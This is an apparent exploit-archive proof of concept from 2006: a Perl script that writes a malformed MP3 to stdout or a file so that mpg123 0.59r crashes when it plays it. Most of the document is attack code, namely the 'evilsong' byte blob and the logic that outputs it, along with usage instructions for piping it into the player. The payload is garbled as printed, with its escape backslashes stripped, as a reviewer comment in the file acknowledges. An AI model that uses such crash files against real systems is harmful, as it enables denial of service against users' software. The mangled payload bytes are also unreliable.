
# Title : mpg123 0.59r Malformed mp3 (SIGSEGV) Proof of Concept
# Published : 2006-04-02
# Author : nitr0us


#!/usr/bin/perl
#
# Affected product: mpg123-0.59r - http://mpg123.de
#
# I'm not sure what kind of vulnerability it is, but the program
# receives a SIGSEGV when I play it. My gdb skillz r p00r, but
# anybody with more experience than me can find the *real* bug.
#
# $./mpg1DoS3 0 | mpg123 -
# (the - switch tells mpg123 to play from stdin)
# $./mpg1DoS3 1 evil.mp3
# $mpg123 ./evil.mp3
#
# Regards.
# Nitrous
# Vulnfact Security Group - http://www.vulnfact.com

# The malformed-MP3 sample described in the header; written either to
# STDOUT (mode 0) or to the file named on the command line (mode 1).
# NOTE(review): as rendered on this page the literal is an ASCII string
# of 'x' characters and hex digits, so the listing may not reproduce the
# original literal exactly -- confirm against the original source before
# relying on it.
my $evilsong =
"xffxf2xc5x53xffxffxa1xe2x41x41xadx9bxfbx3f".
"xdcxe0x38x4cx7fxffx6fxe7x0cx0fxc3x3fx7fxef".
"x9axa8x3ex00xaaxe6x82xc3xe8x65x7fxf1x39x25".
"x24xecx43xe6x12x44xb9xd5x7ax2ax26xcexffxeb".
"xeaxc7x2cxdex9bxeexbax5axe7x0bx9dx14xefxe7".
"x6bxf5xa2xb0x5cx4bx23xffxffxe4xc2x53xffxff".
"xadx21x27x0dx84xd2x7dx1exadx5ex96x62x54x32".
"x85x89x24x93xedxf3xacxd4x94xeax58x54xcax29".
"x1dx7dx7exd3x34x7exb4x44x24x6ax25xdexffxed".
"x57x9dx2ex94xcbxe3xd5x48x96x74x5bxf7xd6x74".
"x84xfcx9axc0x79x75x7ax1ex31x1fx9fx9fx11x94".
"xd1x2cx48xfex5dx58xd1x9fx2bx25x2axffxffxd0".
"x15x48x1fxffxfex83x21xcfxffxffx52x61x18x6a".
"xdfxffxfax90x11x01x59x37xfdx13xf5x3cx7ex58".
"x71xe8x67xd1x0excdxeex80xb4x35x2ax4bx4fxff".
"xf8xb0x03x82x1cxf3x87x5fx6exf9x9axdcx5ex49".
"x51xc6xe0x15x04xcax49x14x0dx90x25x0ax54x04".
"x3cxc0x57x3cx8ax7ax56x1cx42xf2x47x47xb0x1c".
"x67xffxffxacxc1x17xffxffxeax19x89x63x4fxff".
"xf5x2ex91x04x59x93x93xffxf7xd5xb9x28x46x20".
"x9exd5xefxadx6dxb6x98x6cx96xacxf3xd6x8exdc".
"xc1x5ax1ax8dx02x67x1exc3xc9xfexbfxfex89xc1".
"xf4x79x98x4ex33x8bxc8x00x41x54x94x8cx06xc2".
"x69x58x8ax04xc1x76x2fx67x6cx09x0exffxfbx92".
"x60xb9x00x02x6dx67x56xe1xe7x3bx68x63x2cxea".
"xddx60xedx6dx0ax65x9dx5dx87xb5x4dxa1x71x2f".
"xabx74xf5x35xb4xd4xcexb6x76x7fx73x44x16xb5".
"x35x01x59xbfxffxfax01xa4xd7xffxffxe7x96x7f".
"xffxfexa5x89x85xbfxffxffx3cx7cx21x1fxffx7f".
"xf3x4fx63x3fx6ex3fx9ax9bx9ax54x1dx02x52x32".
"xecx7exadxd3xfdx09x82xd8x82x38xb8xa0xdexf6".
"xd3xdex23xa0x0ax51xb8xc0x61xc6xe5x20x02x48".
"x51x9cxa7x94xd7xdaxfcx4ex7axeax0bx19x84xd6".
"xcax8dx01xbbx5fxabxffxf2xa1xe6x7fxffxffxa8".
"xc8x4bx0bx1bxffxf7x5axa8x0cx18x54x44x45xbf".
"xffxe8x06x81x81x37x45x5fxf4x3dxf8x37x0dx12".
"x47xffx32x6fxccx87xa2x49";

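# Print the banner and command-line usage, then terminate the program.
# Never returns: every caller relies on the exit() to stop execution.
# $0 is the script name as invoked.
sub usage
{
	# The listing had bare "n"/"t" at the ends of these strings where
	# newline and tab escapes are clearly intended; restored here.
	print "###################################################\n";
	print "####        mpg123 DoS Proof of Concept        ####\n";
	print "###### nitrous<at>conthackto<dot>com<dot>mx  ######\n";
	print "###################################################\n\n";
	print "Usage: $0 <mode> [evil.mp3]\n";
	print "\tmodes: [0 (stdout) | 1 (file)]\n";
	exit;
}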

# A mode argument is mandatory; usage() exits, so nothing below runs
# when it is missing.
usage() unless @ARGV;

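# Dispatch on the requested mode (first argument):
#   '0' -- write the sample to STDOUT (for piping into a player)
#   '1' -- write the sample to the file named by the second argument
# Anything else prints usage and exits.
# String comparison is used on purpose: the original numeric "== 0"
# treated any non-numeric argument as mode 0 (a warning, then a dump).
my $mode = $ARGV[0];

if ($mode eq '0') {
	# The sample is raw bytes; binary mode avoids newline/encoding
	# translation on platforms that perform it on text handles.
	binmode STDOUT;
	print $evilsong;
}
elsif ($mode eq '1') {
	my $outfile = $ARGV[1];
	# "0" is a legal filename, so test definedness/length, not truth.
	unless (defined $outfile && length $outfile) {
		print "Filename required !\n\n";
		usage();
	}

	# Three-argument open with a lexical handle: the name comes from
	# the command line, and with two-argument open a leading '>' or
	# a trailing '|' in it would be parsed as a mode or a pipe.
	open my $fh, '>', $outfile or die "Cannot create \"$outfile\": $!\n";
	binmode $fh;
	print {$fh} $evilsong;
	# Buffered write errors only surface at close, so check it too.
	close $fh or die "Cannot write \"$outfile\": $!\n";

	# The original message interpolated an undefined $mpg123 variable;
	# the program name is meant literally.
	print "Ready !\nNow just type mpg123 $outfile\n";
}
else {
	print "Invalid Mode !\n\n";
	usage();
}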
